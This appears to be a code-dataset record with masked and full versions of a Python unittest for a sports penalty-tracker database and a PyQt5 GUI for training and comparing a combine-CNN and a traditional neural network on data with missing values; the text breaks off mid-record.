"step-1": "<mask token>\n\n\nclass TestingPenaltyTracker(unittest.TestCase):\n <mask token>\n\n @classmethod\n def tearDownClass(cls):\n cls.testPenaltyTracker = None\n cls.controlDatabase = None\n os.remove(os.path.join(os.getcwd(), 'Tests', 'test_penalty.db'))\n <mask token>\n <mask token>\n\n def testPenaltyProcessing(self):\n self.testPenaltyTracker.setTargetDate('2016-10-24')\n self.testPenaltyTracker.run()\n self.assertEqual(self.controlDatabase.getHighestID(), self.\n testPenaltyTracker.databaseManager.getHighestID())\n getAllCommand = 'SELECT * FROM PenaltyTracker'\n controlRows = self.controlDatabase.getData(getAllCommand)\n testRows = self.testPenaltyTracker.databaseManager.getData(\n getAllCommand)\n self.assertEqual(controlRows, testRows)\n",
"step-2": "<mask token>\n\n\nclass TestingPenaltyTracker(unittest.TestCase):\n <mask token>\n\n @classmethod\n def tearDownClass(cls):\n cls.testPenaltyTracker = None\n cls.controlDatabase = None\n os.remove(os.path.join(os.getcwd(), 'Tests', 'test_penalty.db'))\n\n def testGameUrls(self):\n self.testPenaltyTracker.setTargetDate('2016-02-26')\n numberOfGames = len(self.testPenaltyTracker.GetGameURLS())\n self.assertEqual(numberOfGames, 5)\n\n def testSetDBLocation(self):\n self.assertNotEqual(self.testPenaltyTracker.databaseManager, None)\n\n def testPenaltyProcessing(self):\n self.testPenaltyTracker.setTargetDate('2016-10-24')\n self.testPenaltyTracker.run()\n self.assertEqual(self.controlDatabase.getHighestID(), self.\n testPenaltyTracker.databaseManager.getHighestID())\n getAllCommand = 'SELECT * FROM PenaltyTracker'\n controlRows = self.controlDatabase.getData(getAllCommand)\n testRows = self.testPenaltyTracker.databaseManager.getData(\n getAllCommand)\n self.assertEqual(controlRows, testRows)\n",
"step-3": "<mask token>\n\n\nclass TestingPenaltyTracker(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.testPTDatabase = os.path.join(os.getcwd(), 'Tests',\n 'test_penalty.db')\n cls.testPenaltyTracker = PenaltyTracker()\n cls.testPenaltyTracker.setDatabaseLocation(cls.testPTDatabase)\n cls.testPenaltyTracker.setSeason('PenaltyTracker')\n cls.testPenaltyTracker.createAndSetDatabaseManager()\n controlPath = os.path.join(os.getcwd(), 'Tests',\n 'season_test_10-24-16.db')\n cls.controlDatabase = DatabaseManager(controlPath, 'PenaltyTracker')\n\n @classmethod\n def tearDownClass(cls):\n cls.testPenaltyTracker = None\n cls.controlDatabase = None\n os.remove(os.path.join(os.getcwd(), 'Tests', 'test_penalty.db'))\n\n def testGameUrls(self):\n self.testPenaltyTracker.setTargetDate('2016-02-26')\n numberOfGames = len(self.testPenaltyTracker.GetGameURLS())\n self.assertEqual(numberOfGames, 5)\n\n def testSetDBLocation(self):\n self.assertNotEqual(self.testPenaltyTracker.databaseManager, None)\n\n def testPenaltyProcessing(self):\n self.testPenaltyTracker.setTargetDate('2016-10-24')\n self.testPenaltyTracker.run()\n self.assertEqual(self.controlDatabase.getHighestID(), self.\n testPenaltyTracker.databaseManager.getHighestID())\n getAllCommand = 'SELECT * FROM PenaltyTracker'\n controlRows = self.controlDatabase.getData(getAllCommand)\n testRows = self.testPenaltyTracker.databaseManager.getData(\n getAllCommand)\n self.assertEqual(controlRows, testRows)\n",
"step-4": "from PenaltyTracker import PenaltyTracker\nfrom DatabaseManager import DatabaseManager\nimport unittest, os, sys, shutil, filecmp\n\n\nclass TestingPenaltyTracker(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.testPTDatabase = os.path.join(os.getcwd(), 'Tests',\n 'test_penalty.db')\n cls.testPenaltyTracker = PenaltyTracker()\n cls.testPenaltyTracker.setDatabaseLocation(cls.testPTDatabase)\n cls.testPenaltyTracker.setSeason('PenaltyTracker')\n cls.testPenaltyTracker.createAndSetDatabaseManager()\n controlPath = os.path.join(os.getcwd(), 'Tests',\n 'season_test_10-24-16.db')\n cls.controlDatabase = DatabaseManager(controlPath, 'PenaltyTracker')\n\n @classmethod\n def tearDownClass(cls):\n cls.testPenaltyTracker = None\n cls.controlDatabase = None\n os.remove(os.path.join(os.getcwd(), 'Tests', 'test_penalty.db'))\n\n def testGameUrls(self):\n self.testPenaltyTracker.setTargetDate('2016-02-26')\n numberOfGames = len(self.testPenaltyTracker.GetGameURLS())\n self.assertEqual(numberOfGames, 5)\n\n def testSetDBLocation(self):\n self.assertNotEqual(self.testPenaltyTracker.databaseManager, None)\n\n def testPenaltyProcessing(self):\n self.testPenaltyTracker.setTargetDate('2016-10-24')\n self.testPenaltyTracker.run()\n self.assertEqual(self.controlDatabase.getHighestID(), self.\n testPenaltyTracker.databaseManager.getHighestID())\n getAllCommand = 'SELECT * FROM PenaltyTracker'\n controlRows = self.controlDatabase.getData(getAllCommand)\n testRows = self.testPenaltyTracker.databaseManager.getData(\n getAllCommand)\n self.assertEqual(controlRows, testRows)\n",
"step-5": "from PenaltyTracker import PenaltyTracker\nfrom DatabaseManager import DatabaseManager\nimport unittest,os,sys,shutil, filecmp\n\nclass TestingPenaltyTracker(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.testPTDatabase = os.path.join( os.getcwd(), \"Tests\", \"test_penalty.db\")\n cls.testPenaltyTracker = PenaltyTracker()\n cls.testPenaltyTracker.setDatabaseLocation(cls.testPTDatabase)\n cls.testPenaltyTracker.setSeason(\"PenaltyTracker\")\n cls.testPenaltyTracker.createAndSetDatabaseManager()\n\n controlPath = os.path.join(os.getcwd(), \"Tests\", \"season_test_10-24-16.db\")\n cls.controlDatabase = DatabaseManager(controlPath, \"PenaltyTracker\")\n\n @classmethod\n def tearDownClass(cls):\n cls.testPenaltyTracker = None\n cls.controlDatabase = None\n os.remove( os.path.join( os.getcwd(), \"Tests\", \"test_penalty.db\") )\n\n def testGameUrls(self):\n self.testPenaltyTracker.setTargetDate(\"2016-02-26\")\n numberOfGames = len( self.testPenaltyTracker.GetGameURLS() )\n self.assertEqual( numberOfGames, 5 )\n\n def testSetDBLocation(self):\n self.assertNotEqual(self.testPenaltyTracker.databaseManager, None )\n\n def testPenaltyProcessing(self):\n # generate the test data\n self.testPenaltyTracker.setTargetDate(\"2016-10-24\") \n self.testPenaltyTracker.run();\n\n self.assertEqual( self.controlDatabase.getHighestID(), self.testPenaltyTracker.databaseManager.getHighestID() )\n \n getAllCommand = \"SELECT * FROM PenaltyTracker\"\n controlRows = self.controlDatabase.getData(getAllCommand)\n testRows = self.testPenaltyTracker.databaseManager.getData(getAllCommand)\n self.assertEqual(controlRows, testRows)\n\n\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
import sys
from PyQt5.QtWidgets import (QMainWindow, QWidget, QHBoxLayout, QVBoxLayout, QFrame,
QSplitter, QStyleFactory, QApplication, QPushButton, QTextEdit, QLabel, QFileDialog, QMessageBox)
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QFont, QColor
import myLoadData
from UIPack import setLossParameterDialog, showDataWidget, setModelParametersDialog, TrainingWidget, showResultWidget,\
showJudgeWidgets, chooseJudgeDataSetWidget
from MyCombCNNPack import combineNumCalculate, myCombineCNN, traditionalNN, Judgement
class MyMainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.windowLength = 1250
self.windowHigh = 900
self.fname = dict()
self.fname['New'] = None
self.fname['Tra'] = None
self.dataLossRate = dict()
self.dataSetLossValue = dict()
self.dataFor = dict()
self.dataFor['New'] = None
self.dataLossRate['New'] = 0.
self.dataSetLossValue['New'] = 0.
self.dataFor['Tra'] = None
self.dataLossRate['Tra'] = 0.
self.dataSetLossValue['Tra'] = 0.
self.traingWidgetOnFlag = dict()
self.traingWidgetOnFlag['New'] = False
self.traingWidgetOnFlag['Tra'] = False
self.combineNumConv = 2
self.convCoreNum = 5
self.combineNumPooling = 4
self.fullConnectOutInRate = 0.5
self.mcbcnn = None
self.trann = None
self.trainingW = None
self.trainingWT = None
self.initUI()
self.initConnect()
def initUI(self):
self.statusBar().showMessage('Ready')
####### data module #######
dataModule = QVBoxLayout()
self.dataFileChooseButton = QPushButton('选择数据')
self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))
self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')
self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))
self.dataShowButton = QPushButton('展示数据')
self.dataShowButton.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Data:')
label.setFont(QFont('微软雅黑', 16))
self.presentDataName = QLabel('None')
self.presentDataName.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentDataName)
dataModule.addStretch(1)
dataModule.addLayout(labelbox)
dataModule.addStretch(1)
dataModule.addWidget(self.dataFileChooseButton)
dataModule.addStretch(1)
dataModule.addWidget(self.dataLossSimulateSettingButton)
dataModule.addStretch(1)
dataModule.addWidget(self.dataShowButton)
dataModule.addStretch(1)
###### training module ########
trainingModule = QVBoxLayout()
self.setModelParametersButton = QPushButton('Model Parameters')
self.setModelParametersButton.setFont(QFont('微软雅黑', 16))
# self.setTrainingParametersButton = QPushButton('Trainning Parameters')
# self.setTrainingParametersButton.setFont(QFont('微软雅黑', 16))
self.trainingButton = QPushButton('Training')
self.trainingButton.setFont(QFont('微软雅黑', 16))
self.saveModelButton = QPushButton('Save Model')
self.saveModelButton.setFont(QFont('微软雅黑', 16))
self.loadModelButton = QPushButton('Load Model')
self.loadModelButton.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Model:')
label.setFont(QFont('微软雅黑', 16))
self.presentModelName = QLabel('None')
self.presentModelName.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentModelName)
trainingModule.addStretch(1)
trainingModule.addLayout(labelbox)
trainingModule.addStretch(1)
trainingModule.addWidget(self.setModelParametersButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.trainingButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.saveModelButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.loadModelButton)
trainingModule.addStretch(1)
############## new cnn result show ######
resultShowModule = QVBoxLayout()
self.showResultButton = QPushButton('分类结果展示')
self.showResultButton.setFont(QFont('微软雅黑', 16))
self.judgeResultButton = QPushButton('分类结果评估')
self.judgeResultButton.setFont(QFont('微软雅黑', 16))
resultShowModule.addWidget(self.showResultButton)
resultShowModule.addWidget(self.judgeResultButton)
################# new algorithm ui ##########
hboxTop = QHBoxLayout()
hboxTop.addStretch(1)
mcnnLabel = QLabel('Combine-CNN:')
mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))
hboxTop.addWidget(mcnnLabel)
hboxTop.addStretch(1)
hboxTop.addLayout(dataModule)
hboxTop.addStretch(1)
hboxTop.addLayout(trainingModule)
hboxTop.addStretch(1)
hboxTop.addLayout(resultShowModule)
hboxTop.addStretch(1)
#########traditional data module##########
dataModuleT = QVBoxLayout()
self.dataFileChooseButtonT = QPushButton('选择数据')
self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))
self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')
self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))
self.dataPreProcessButtonT = QPushButton('数据预处理')
self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))
self.dataShowButtonT = QPushButton('展示数据')
self.dataShowButtonT.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Data:')
label.setFont(QFont('微软雅黑', 16))
self.presentDataNameT = QLabel('None')
self.presentDataNameT.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentDataNameT)
dataModuleT.addStretch(1)
dataModuleT.addLayout(labelbox)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataFileChooseButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataPreProcessButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataShowButtonT)
dataModuleT.addStretch(1)
###### training module ########
trainingModuleT = QVBoxLayout()
self.setModelParametersButtonT = QPushButton('Model Parameters')
self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))
self.trainingButtonT = QPushButton('Training')
self.trainingButtonT.setFont(QFont('微软雅黑', 16))
self.saveModelButtonT = QPushButton('Save Model')
self.saveModelButtonT.setFont(QFont('微软雅黑', 16))
self.loadModelButtonT = QPushButton('Load Model')
self.loadModelButtonT.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Model:')
label.setFont(QFont('微软雅黑', 16))
self.presentModelNameT = QLabel('None')
self.presentModelNameT.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentModelNameT)
trainingModuleT.addStretch(1)
trainingModuleT.addLayout(labelbox)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.setModelParametersButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.trainingButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.saveModelButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.loadModelButtonT)
trainingModuleT.addStretch(1)
############## traditional nn result show ######
resultShowModuleT = QVBoxLayout()
self.showResultButtonT = QPushButton('分类结果展示')
self.showResultButtonT.setFont(QFont('微软雅黑', 16))
self.judgeResultButtonT = QPushButton('分类结果评估')
self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))
resultShowModuleT.addWidget(self.showResultButtonT)
resultShowModuleT.addWidget(self.judgeResultButtonT)
####### traditional algorithm #########
hboxBottom = QHBoxLayout(self)
hboxBottom.addStretch(1)
traditionNNLabel = QLabel('Traditional NN:')
traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))
hboxBottom.addWidget(traditionNNLabel)
hboxBottom.addStretch(1)
hboxBottom.addLayout(dataModuleT)
hboxBottom.addStretch(1)
hboxBottom.addLayout(trainingModuleT)
hboxBottom.addStretch(1)
hboxBottom.addLayout(resultShowModuleT)
hboxBottom.addStretch(1)
########## whole frame layout ########
splitterLine = QLabel(self)
splitterLine.setFont(QFont('Times', 1))
col = QColor(0, 0, 0)
splitterLine.setStyleSheet("QWidget { background-color: %s }" % col.name())
splitterLine.resize(splitterLine.sizeHint())
vbox = QVBoxLayout()
vbox.addLayout(hboxTop)
# vbox.addWidget(QLabel(str('_'*int(self.width()/3))))
vbox.addWidget(splitterLine)
vbox.addLayout(hboxBottom)
mainWidget = QWidget()
mainWidget.setLayout(vbox)
self.setCentralWidget(mainWidget)
self.setGeometry(350, 100, self.windowLength, self.windowHigh)
self.setWindowTitle('适用于有缺失值数据集的神经网络系统')
self.show()
def initConnect(self):
self.dataFileChooseButton.clicked.connect(self.chooseData)
self.dataFileChooseButtonT.clicked.connect(self.chooseData)
self.dataLossSimulateSettingButton.clicked.connect(self.setLossParameter)
self.dataLossSimulateSettingButtonT.clicked.connect(self.setLossParameter)
self.dataShowButton.clicked.connect(self.showData)
self.dataShowButtonT.clicked.connect(self.showData)
self.dataPreProcessButtonT.clicked.connect(self.preProcess)
self.setModelParametersButton.clicked.connect(self.setModelParameters)
self.setModelParametersButtonT.clicked.connect(self.setModelParameters)
self.trainingButton.clicked.connect(self.training)
self.trainingButtonT.clicked.connect(self.training)
self.saveModelButton.clicked.connect(self.saveModel)
self.saveModelButtonT.clicked.connect(self.saveModel)
self.loadModelButton.clicked.connect(self.loadModel)
self.loadModelButtonT.clicked.connect(self.loadModel)
self.showResultButton.clicked.connect(self.showResult)
self.showResultButtonT.clicked.connect(self.showResult)
self.judgeResultButton.clicked.connect(self.showJudge)
self.judgeResultButtonT.clicked.connect(self.showJudge)
############ data load module #####################
def chooseData(self):
if self.sender() is self.dataFileChooseButton:
self.fname['New'], ok = QFileDialog.getOpenFileName(self, 'Open file', '..', 'Text files (*.txt)')
if ok:
# dataname = self.fname['New'].split('/')[-1].split('.')[0]
# # print(dataname)
# self.presentDataName.setText(dataname)
# self.presentDataName.resize(self.presentDataName.sizeHint())
self.loadData()
elif self.sender() is self.dataFileChooseButtonT:
self.fname['Tra'], ok = QFileDialog.getOpenFileName(self, 'Open file', '..', 'Text files (*.txt)')
if ok:
# dataname = self.fname['Tra'].split('/')[-1].split('.')[0]
# # print(dataname)
# self.presentDataNameT.setText(dataname)
# self.presentDataNameT.resize(self.presentDataNameT.sizeHint())
self.loadData()
return
def loadData(self):
if self.sender() is self.dataFileChooseButton:
try:
self.dataFor['New'] = myLoadData.loadData(self.fname['New'], self.dataLossRate['New'], self.dataSetLossValue['New'])
# print(self.dataFor['New'].DataTrainX, '\n', self.dataFor['New'].DataTrainY)
except FileNotFoundError as e:
reply = QMessageBox.information(self, 'Message', "Data file not exist",
QMessageBox.Yes, QMessageBox.Yes)
return
except Exception:
reply = QMessageBox.information(self, 'Message', "Data file format error",
QMessageBox.Yes, QMessageBox.Yes)
return
dataname = self.fname['New'].split('/')[-1].split('.')[0]
# print(dataname)
self.presentDataName.setText(dataname)
self.presentDataName.resize(self.presentDataName.sizeHint())
elif self.sender() is self.dataFileChooseButtonT:
try:
self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'], self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])
# print(self.dataFor['Tra'].DataTrainX, '\n', self.dataFor['Tra'].DataTrainY)
except FileNotFoundError as e:
reply = QMessageBox.information(self, 'Message', "Data file not exist",
QMessageBox.Yes, QMessageBox.Yes)
return
except Exception:
reply = QMessageBox.information(self, 'Message', "Data file format error",
QMessageBox.Yes, QMessageBox.Yes)
return
dataname = self.fname['Tra'].split('/')[-1].split('.')[0]
# print(dataname)
self.presentDataNameT.setText(dataname)
self.presentDataNameT.resize(self.presentDataNameT.sizeHint())
return
def setLossParameter(self):
if self.sender() is self.dataLossSimulateSettingButton:
self.setLPDialog = setLossParameterDialog.setLossParameterDialog('combine-CNN设置缺失参数', self, 'New')
elif self.sender() is self.dataLossSimulateSettingButtonT:
self.setLPDialog = setLossParameterDialog.setLossParameterDialog('traditional NN设置缺失参数', self, 'Tra')
# print(self.dataLossRate)
# print(self.dataSetLossValue)
return
def showData(self):
if self.sender() is self.dataShowButton:
# print(1)
self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示', self, 'New')
elif self.sender() is self.dataShowButtonT:
# print(1)
self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示', self, 'Tra')
return
def preProcess(self):
if self.dataFor['Tra'] is None:
reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',
QMessageBox.Yes, QMessageBox.Yes)
else:
self.dataFor['Tra'].MeanPreProcess()
reply = QMessageBox.information(self, 'Message', 'PreProcess succeed!',
QMessageBox.Yes, QMessageBox.Yes)
return
############## training module #################
def setModelParameters(self):
if self.sender() is self.setModelParametersButton:
# print(1)
self.setModelParaW = setModelParametersDialog.setLossParameterDialog('combine-CNN模型参数设置', self, 'New')
elif self.sender() is self.setModelParametersButtonT:
self.setModelParaW = setModelParametersDialog.setLossParameterDialog('traditional NN模型参数设置', self, 'Tra')
def training(self):
if self.sender() is self.trainingButton:
if self.trainingW is not None:
self.trainingW.hide()
# print(self.trainingW)
self.trainingW.show()
return
senderName = 'New'
elif self.sender() is self.trainingButtonT:
if self.trainingWT is not None:
self.trainingWT.hide()
self.trainingWT.show()
senderName = 'Tra'
if self.dataFor[senderName] is None:
reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练',
QMessageBox.Yes, QMessageBox.Yes)
return
elif senderName == 'New':
if self.dataFor[senderName].DataTrainX.shape[1] < self.combineNumConv:
reply = QMessageBox.information(self, '参数错误', '卷积层组合(卷积核)大小大于数据集特征数量',
QMessageBox.Yes, QMessageBox.Yes)
return
if combineNumCalculate.combineNumCal(self.dataFor[senderName].DataTrainX.shape[1], self.combineNumConv)\
< self.combineNumPooling:
reply = QMessageBox.information(self, '参数错误', '池化层组合(池化核)大小大于卷积层输出特征向量维度',
QMessageBox.Yes, QMessageBox.Yes)
return
# print(self.trainingW)
if self.trainingWT is not None:
reply = QMessageBox.information(self, '提示', 'traditional NN训练正在进行,请等待其结束',
QMessageBox.Yes, QMessageBox.Yes)
return
self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练', self, senderName)
self.traingWidgetOnFlag[senderName] = False
elif senderName == 'Tra':
if self.trainingW is not None:
reply = QMessageBox.information(self, '提示', 'combine-CNN训练正在进行,请等待其结束',
QMessageBox.Yes, QMessageBox.Yes)
return
self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练', self, senderName)
self.traingWidgetOnFlag[senderName] = False
return
def saveModel(self):
if self.sender() is self.saveModelButton:
if self.mcbcnn is None:
reply = QMessageBox.information(self, '模型错误', '模型不存在',
QMessageBox.Yes, QMessageBox.Yes)
return
else:
fname, ok = QFileDialog.getSaveFileName(self, 'Save Model', '..\\myCombineCNN.cbcnn.json',
'Combine-CNN json files (*.cbcnn.json)')
if ok:
succeed = self.mcbcnn.saveModel(fname)
if succeed:
reply = QMessageBox.information(self, '保存结果', '模型保存成功',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
elif self.sender() is self.saveModelButtonT:
if self.trann is None:
reply = QMessageBox.information(self, '模型错误', '模型不存在',
QMessageBox.Yes, QMessageBox.Yes)
return
else:
fname, ok = QFileDialog.getSaveFileName(self, 'Save Model', '..\\traditionalNN.trann.json',
'Traditional NN json files (*.trann.json)')
if ok:
succeed = self.trann.saveModel(fname)
if succeed:
reply = QMessageBox.information(self, '保存结果', '模型保存成功',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
def loadModel(self):
if self.sender() is self.loadModelButton:
fname, ok = QFileDialog.getOpenFileName(self, 'Load Model', '..',
'Combine-CNN json files (*.cbcnn.json)')
if ok:
if self.mcbcnn is None:
self.mcbcnn = myCombineCNN.myCombineCNN(None, self.combineNumConv, self.convCoreNum, self.combineNumPooling)
succeed = self.mcbcnn.setModel(fname)
if succeed:
modelName = fname.split('/')[-1].split('.')[0]
self.presentModelName.setText(modelName)
reply = QMessageBox.information(self, '设置结果', '模型设置成功',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
elif self.sender() is self.loadModelButtonT:
fname, ok = QFileDialog.getOpenFileName(self, 'Load Model', '..',
'Traditional NN json files (*.trann.json)')
if ok:
if self.trann is None:
self.trann = traditionalNN.traditionalNN(None)
succeed = self.trann.setModel(fname)
if succeed:
modelName = fname.split('/')[-1].split('.')[0]
self.presentModelNameT.setText(modelName)
reply = QMessageBox.information(self, '设置结果', '模型设置成功',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
return
def showResult(self):
if self.sender() is self.showResultButton:
if self.traingWidgetOnFlag['New']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.showResultW = showResultWidget.ShowResultWidget('combine-CNN预测结果展示', self, 'New')
elif self.sender() is self.showResultButtonT:
if self.traingWidgetOnFlag['Tra']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.showResultW = showResultWidget.ShowResultWidget('traditional NN预测结果展示', self, 'Tra')
return
def showJudge(self):
if self.sender() is self.judgeResultButton:
if self.traingWidgetOnFlag['New']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget('Choose Judgement-based-on Data Set',
self, 'New')
elif self.sender() is self.judgeResultButtonT:
if self.traingWidgetOnFlag['Tra']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget('Choose Judgement-based-on Data Set',
self, 'Tra')
# self.testw = showJudgeWidgets.judgeWidget('test', self, 'New', 'Train')
# self.mcbcnn.runCNN('Test', self.dataFor['New'])
# drawCM = Judgement.myJudge(self.mcbcnn.data.yClassDic, self.mcbcnn.getAccuratePredictResult().argmax(1), self.mcbcnn.data.DataTestY.argmax(1))
# drawCM.plotConfuseMatrix()
if __name__ == '__main__':
app = QApplication(sys.argv)
myMainWindow = MyMainWindow()
sys.exit(app.exec_())
|
normal
|
{
"blob_id": "302605d8bb45b1529742bf9441d476f0276085b9",
"index": 9,
"step-1": "<mask token>\n\n\nclass MyMainWindow(QMainWindow):\n <mask token>\n <mask token>\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n def chooseData(self):\n if self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n return\n\n def loadData(self):\n if self.sender() is self.dataFileChooseButton:\n try:\n self.dataFor['New'] = myLoadData.loadData(self.fname['New'],\n self.dataLossRate['New'], self.dataSetLossValue['New'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['New'].split('/')[-1].split('.')[0]\n self.presentDataName.setText(dataname)\n self.presentDataName.resize(self.presentDataName.sizeHint())\n elif self.sender() is self.dataFileChooseButtonT:\n try:\n self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],\n self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n self.presentDataNameT.setText(dataname)\n self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n return\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n <mask token>\n\n def preProcess(self):\n if self.dataFor['Tra'] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n self.dataFor['Tra'].MeanPreProcess()\n reply = QMessageBox.information(self, 'Message',\n 'PreProcess succeed!', QMessageBox.Yes, QMessageBox.Yes)\n return\n <mask token>\n <mask token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, 